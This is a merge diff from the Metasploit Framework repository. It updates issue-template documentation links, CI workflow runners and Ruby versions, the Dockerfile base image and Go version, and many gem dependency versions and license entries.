automatic module_metadata_base.json update

Land #17163 , Pfsense PfBlockerNG RCE module check method improvement
Merge branch 'land-17163' into upstream-master
2022-12-01 09:50:22 -06:00 · 2022-12-01 09:25:18 -06:00 · 2022-11-30 16:55:15 -06:00 · 2022-11-30 22:31:53 +00:00 · 2022-11-30 22:10:18 +01:00 · 2022-11-30 11:43:21 -06:00
940 changed files with 66056 additions and 14738 deletions
@@ -8,8 +8,8 @@ labels: "bug"
  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
-  - Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
+  - Wiki: https://docs.metasploit.com/
+  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html

  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-docs"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -33,7 +33,7 @@ Why should we document this and who will benefit from it?
 ### Draft the doc

 - [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
  - [Example of a similar article]()

@@ -8,7 +8,7 @@ labels: "suggestion-feature"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-module"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "question"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -31,4 +31,4 @@ Complex Software Examples:
 We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

 Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
+If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
@@ -31,7 +31,7 @@ on:
 jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
@@ -43,7 +43,7 @@ jobs:
    name: Ruby ${{ matrix.ruby }}
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
@@ -28,7 +28,7 @@ jobs:
  handle-labels:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/github-script@v3
+      - uses: actions/github-script@v6
        with:
          github-token: ${{secrets.GITHUB_TOKEN}}
          script: |
@@ -172,7 +172,7 @@ jobs:

                    This includes:

-                    - All of the item points within this [tempate](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
+                    - All of the item points within this [template](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
                    - The result of the \`debug\` command in your Metasploit console
                    - Screenshots showing the issues you're having
                    - Exact replication steps
@@ -202,16 +202,16 @@ jobs:

            if (config.comment) {
              const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
-              const commentWithoutPreceedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.issues.createComment({
+              const commentWithoutPrecedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
+              await github.rest.issues.createComment({
                issue_number: context.issue.number,
                owner: context.repo.owner,
                repo: context.repo.repo,
-                body: commentWithoutPreceedingWhitespace
+                body: commentWithoutPrecedingWhitespace
              });
            }
            if (config.close) {
-              await github.issues.update({
+              await github.rest.issues.update({
                  issue_number: context.issue.number,
                  owner: context.repo.owner,
                  repo: context.repo.repo,
@@ -28,14 +28,14 @@ on:

 jobs:
  msftidy:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
+          - 2.7

    name: Lint msftidy
    steps:
@@ -43,7 +43,7 @@ jobs:
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3
        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
        with:
@@ -28,12 +28,12 @@ on:

 jobs:
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40
    name: Docker Build
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: docker-compose build
        run: |
@@ -44,7 +44,7 @@ jobs:
          /usr/bin/docker-compose build

  test:
-    runs-on: ubuntu-18.04
+    runs-on: ${{ matrix.os }}
    timeout-minutes: 40

    services:
@@ -64,10 +64,19 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
          - 2.7
-          - 3.0.3
-          - 3.1.1
+          - 3.0
+          - 3.1
+        os:
+          - ubuntu-20.04
+          - ubuntu-latest
+        exclude:
+          - { os: ubuntu-latest, ruby: 2.7 }
+          - { os: ubuntu-latest, ruby: 3.0 }
+        include:
+          - os: ubuntu-latest
+            ruby: 3.1
+            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -78,13 +87,13 @@ jobs:
    env:
      RAILS_ENV: test

-    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        env:
@@ -3,6 +3,8 @@ Gemfile.local
 Gemfile.local.lock
 # Rubymine project directory
 .idea
+# Visual Studio Code configuration settings directory
+.vscode
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
@@ -36,7 +36,7 @@ when an individual is representing the project or its community.

 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
-the incident involves a committer, you may report directly to
+the incident involves a committer, you may report it directly to
 caitlin_condon@rapid7.com or todb@metasploit.com.

 All complaints will be reviewed and investigated and will result in a
@@ -1,4 +1,4 @@
-FROM ruby:3.0.2-alpine3.12 AS builder
+FROM ruby:3.0.4-alpine3.15 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -40,15 +40,16 @@ RUN apk add --no-cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle

+ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
-    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
-    tar -zxf go1.11.2.src.tar.gz && \
-    rm go1.11.2.src.tar.gz && \
+    curl -O https://dl.google.com/go/go1.19.3.src.tar.gz && \
+    tar -zxf go1.19.3.src.tar.gz && \
+    rm go1.19.3.src.tar.gz && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.2-alpine3.12
+FROM ruby:3.0.4-alpine3.15
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -59,7 +60,9 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm mingw-w64-gcc
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
+    python2-dev openssl-dev nasm mingw-w64-gcc

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -15,7 +15,11 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry-byebug'
+  # lock to version with 2.6 support until project updates
+  gem 'pry-byebug', '~> 3.9.0'
+  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
+  # Replaces the old lib/debug.rb and provides more features.
+  gem 'debug', '>= 1.0.0'
  # module documentation
  gem 'octokit'
  # memory profiling
@@ -24,7 +28,7 @@ group :development do
  gem 'ruby-prof', '1.4.2'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  # gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -45,4 +49,3 @@ group :test do
  # Manipulate Time.now in specs
  gem 'timecop'
 end
-
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.3)
+    metasploit-framework (6.2.29)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -30,9 +30,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.93)
+      metasploit-payloads (= 2.0.101)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.18)
+      metasploit_payloads-mettle (= 1.0.20)
      mqtt
      msgpack
      nessus_rest
@@ -42,7 +42,7 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit
+      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
      packetfu
@@ -55,7 +55,6 @@ PATH
      rb-readline
      recog
      redcarpet
-      reline (= 0.2.5)
      rex-arch
      rex-bin_tools
      rex-core
@@ -75,7 +74,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
-      ruby_smb (~> 3.1.0)
+      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
      sinatra
@@ -98,61 +97,61 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.6)
-      actionview (= 6.1.6)
-      activesupport (= 6.1.6)
+    actionpack (6.1.7)
+      actionview (= 6.1.7)
+      activesupport (= 6.1.7)
      rack (~> 2.0, >= 2.0.9)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.6)
-      activesupport (= 6.1.6)
+    actionview (6.1.7)
+      activesupport (= 6.1.7)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.6)
-      activesupport (= 6.1.6)
-    activerecord (6.1.6)
-      activemodel (= 6.1.6)
-      activesupport (= 6.1.6)
-    activesupport (6.1.6)
+    activemodel (6.1.7)
+      activesupport (= 6.1.7)
+    activerecord (6.1.7)
+      activemodel (= 6.1.7)
+      activesupport (= 6.1.7)
+    activesupport (6.1.7)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
      zeitwerk (~> 2.3)
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.1)
+      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.598.0)
-    aws-sdk-core (3.131.1)
+    aws-partitions (1.663.0)
+    aws-sdk-core (3.168.0)
      aws-eventstream (~> 1, >= 1.0.2)
-      aws-partitions (~> 1, >= 1.525.0)
-      aws-sigv4 (~> 1.1)
+      aws-partitions (~> 1, >= 1.651.0)
+      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.317.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-ec2 (1.350.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.69.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-iam (1.73.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.57.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-kms (1.59.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.114.0)
-      aws-sdk-core (~> 3, >= 3.127.0)
+    aws-sdk-s3 (1.117.1)
+      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
-    aws-sigv4 (1.5.0)
+    aws-sigv4 (1.5.2)
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.10)
+    bindata (2.4.14)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
@@ -161,8 +160,10 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
+    debug (1.6.3)
+      irb (>= 1.3.6)
+      reline (>= 0.3.1)
    diff-lcs (1.5.0)
-    digest (3.1.0)
    dnsruby (1.61.9)
      simpleidn (~> 0.1)
    docile (1.4.0)
@@ -177,20 +178,21 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.10.0)
+    erubi (1.11.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.21.0)
+    faker (3.0.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.3.0)
-      faraday-net_http (~> 2.0)
+    faraday (2.7.1)
+      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (2.0.3)
-    faraday-retry (1.0.3)
+    faraday-net_http (3.0.2)
+    faraday-retry (2.0.0)
+      faraday (~> 2.0)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
@@ -211,11 +213,11 @@ GEM
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.10.0)
+    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.5.11)
-    irb (1.3.6)
-      reline (>= 0.2.5)
+    irb (1.4.3)
+      reline (>= 0.3.0)
    jmespath (1.6.1)
    jsobfu (0.4.2)
      rkelly-remix
@@ -224,16 +226,16 @@ GEM
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.18.0)
+    loofah (2.19.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
-    memory_profiler (1.0.0)
+    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (4.0.4)
+    metasploit-concern (4.0.5)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-credential (5.0.7)
+    metasploit-credential (5.0.9)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -243,12 +245,12 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.4)
+    metasploit-model (4.0.6)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.93)
-    metasploit_data_models (5.0.5)
+    metasploit-payloads (2.0.101)
+    metasploit_data_models (5.0.6)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
      arel-helpers
@@ -256,87 +258,85 @@ GEM
      metasploit-model (>= 3.1)
      pg
      railties (~> 6.0)
-      recog (~> 2.0)
+      recog
      webrick
-    metasploit_payloads-mettle (1.0.18)
+    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
    mini_portile2 (2.8.0)
-    minitest (5.15.0)
+    minitest (5.16.3)
    mqtt (0.5.0)
-    msgpack (1.5.2)
+    msgpack (1.6.0)
    multi_json (1.15.0)
-    mustermann (1.1.1)
+    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
    net-ldap (0.17.1)
    net-protocol (0.1.3)
      timeout
-    net-smtp (0.3.1)
-      digest
+    net-smtp (0.3.3)
      net-protocol
-      timeout
-    net-ssh (6.1.0)
+    net-ssh (7.0.1)
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.6)
+    nokogiri (1.13.9)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
-    octokit (4.24.0)
+    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
-    openssl-ccm (1.2.2)
-    openssl-cmac (2.0.1)
+    openssl-ccm (1.2.3)
+    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.2.0)
+    parser (3.1.2.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
-    pdf-reader (2.10.0)
+    pdf-reader (2.11.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.3.5)
+    pg (1.4.5)
    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.7)
-    puma (5.6.4)
+    public_suffix (5.0.0)
+    puma (6.0.0)
      nio4r (~> 2.0)
    racc (1.6.0)
-    rack (2.2.3.1)
-    rack-protection (2.2.0)
+    rack (2.2.4)
+    rack-protection (3.0.3)
      rack
-    rack-test (1.1.0)
-      rack (>= 1.0, < 3)
+    rack-test (2.0.2)
+      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.4.3)
      loofah (~> 2.3)
-    railties (6.1.6)
-      actionpack (= 6.1.6)
-      activesupport (= 6.1.6)
+    railties (6.1.7)
+      actionpack (= 6.1.7)
+      activesupport (= 6.1.7)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
    rainbow (3.1.1)
    rake (13.0.6)
    rb-readline (0.5.5)
-    recog (2.3.23)
+    recog (3.0.3)
      nokogiri
    redcarpet (3.5.1)
-    regexp_parser (2.5.0)
-    reline (0.2.5)
+    regexp_parser (2.6.1)
+    reline (0.3.1)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -351,7 +351,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.30)
+    rex-exploitation (0.1.36)
      jsobfu
      metasm
      rex-arch
@@ -365,69 +365,70 @@ GEM
      rex-arch
    rex-ole (0.1.7)
      rex-text
-    rex-powershell (0.1.96)
+    rex-powershell (0.1.97)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.8)
+    rex-random_identifier (0.1.9)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.39)
+    rex-socket (0.1.43)
      rex-core
-    rex-sslscan (0.1.7)
+    rex-sslscan (0.1.8)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.46)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
    rkelly-remix (0.0.7)
-    rspec (3.11.0)
-      rspec-core (~> 3.11.0)
-      rspec-expectations (~> 3.11.0)
-      rspec-mocks (~> 3.11.0)
-    rspec-core (3.11.0)
-      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.0)
+    rspec (3.12.0)
+      rspec-core (~> 3.12.0)
+      rspec-expectations (~> 3.12.0)
+      rspec-mocks (~> 3.12.0)
+    rspec-core (3.12.0)
+      rspec-support (~> 3.12.0)
+    rspec-expectations (3.12.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-mocks (3.11.1)
+      rspec-support (~> 3.12.0)
+    rspec-mocks (3.12.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.11.0)
-    rspec-rails (5.1.2)
-      actionpack (>= 5.2)
-      activesupport (>= 5.2)
-      railties (>= 5.2)
-      rspec-core (~> 3.10)
-      rspec-expectations (~> 3.10)
-      rspec-mocks (~> 3.10)
-      rspec-support (~> 3.10)
+      rspec-support (~> 3.12.0)
+    rspec-rails (6.0.1)
+      actionpack (>= 6.1)
+      activesupport (>= 6.1)
+      railties (>= 6.1)
+      rspec-core (~> 3.11)
+      rspec-expectations (~> 3.11)
+      rspec-mocks (~> 3.11)
+      rspec-support (~> 3.11)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.0)
-    rubocop (1.30.1)
+    rspec-support (3.12.0)
+    rubocop (1.39.0)
+      json (~> 2.3)
      parallel (~> 1.10)
-      parser (>= 3.1.0.0)
+      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.18.0, < 2.0)
+      rubocop-ast (>= 1.23.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.18.0)
+    rubocop-ast (1.23.0)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.2.1)
      bindata
      openssl-ccm
      openssl-cmac
@@ -444,12 +445,13 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (2.2.0)
-      mustermann (~> 1.0)
-      rack (~> 2.2)
-      rack-protection (= 2.2.0)
+    sinatra (3.0.3)
+      mustermann (~> 3.0)
+      rack (~> 2.2, >= 2.2.4)
+      rack-protection (= 3.0.3)
      tilt (~> 2.0)
-    sqlite3 (1.4.2)
+    sqlite3 (1.5.4)
+      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
    thin (1.8.1)
@@ -457,18 +459,18 @@ GEM
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.10)
+    tilt (2.0.11)
    timecop (0.9.5)
    timeout (0.3.0)
    ttfunk (1.7.0)
-    tzinfo (2.0.4)
+    tzinfo (2.0.5)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.1)
+    tzinfo-data (1.2022.6)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.1.0)
+    unicode-display_width (2.3.0)
    unix-crypt (1.3.0)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -494,18 +496,19 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.5.4)
+    zeitwerk (2.6.6)

 PLATFORMS
  ruby

 DEPENDENCIES
+  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
  memory_profiler
  metasploit-framework!
  octokit
-  pry-byebug
+  pry-byebug (~> 3.9.0)
  rake
  redcarpet
  rspec-rails
@@ -15,6 +15,10 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0
+
 Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
@@ -1,25 +1,25 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.6, MIT
-actionview, 6.1.6, MIT
-activemodel, 6.1.6, MIT
-activerecord, 6.1.6, MIT
-activesupport, 6.1.6, MIT
-addressable, 2.8.0, "Apache 2.0"
+actionpack, 6.1.7, MIT
+actionview, 6.1.7, MIT
+activemodel, 6.1.7, MIT
+activerecord, 6.1.7, MIT
+activesupport, 6.1.7, MIT
+addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.595.0, "Apache 2.0"
-aws-sdk-core, 3.131.1, "Apache 2.0"
-aws-sdk-ec2, 1.317.0, "Apache 2.0"
-aws-sdk-iam, 1.68.0, "Apache 2.0"
-aws-sdk-kms, 1.57.0, "Apache 2.0"
-aws-sdk-s3, 1.114.0, "Apache 2.0"
-aws-sigv4, 1.5.0, "Apache 2.0"
+aws-partitions, 1.648.0, "Apache 2.0"
+aws-sdk-core, 3.162.0, "Apache 2.0"
+aws-sdk-ec2, 1.341.0, "Apache 2.0"
+aws-sdk-iam, 1.71.0, "Apache 2.0"
+aws-sdk-kms, 1.58.0, "Apache 2.0"
+aws-sdk-s3, 1.115.0, "Apache 2.0"
+aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.10, ruby
+bindata, 2.4.13, ruby
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
@@ -29,22 +29,22 @@ concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+debug, 1.6.2, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
-digest, 3.1.0, "ruby, Simplified BSD"
 dnsruby, 1.61.9, "Apache 2.0"
 docile, 1.4.0, MIT
 domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.10.0, MIT
+erubi, 1.11.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.21.0, MIT
-faraday, 2.3.0, MIT
-faraday-net_http, 2.0.3, MIT
-faraday-retry, 1.0.3, MIT
+faker, 2.23.0, MIT
+faraday, 2.6.0, MIT
+faraday-net_http, 3.0.1, MIT
+faraday-retry, 2.0.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -57,126 +57,126 @@ hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
 http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.10.0, MIT
+i18n, 1.12.0, MIT
 io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.3.6, "ruby, Simplified BSD"
+irb, 1.4.2, "ruby, Simplified BSD"
 jmespath, 1.6.1, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.2, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.18.0, MIT
+loofah, 2.19.0, MIT
 memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.4, "New BSD"
-metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.3, "New BSD"
-metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.93, "3-clause (or ""modified"") BSD"
+metasploit-concern, 4.0.5, "New BSD"
+metasploit-credential, 5.0.9, "New BSD"
+metasploit-framework, 6.2.29, "New BSD"
+metasploit-model, 4.0.6, "New BSD"
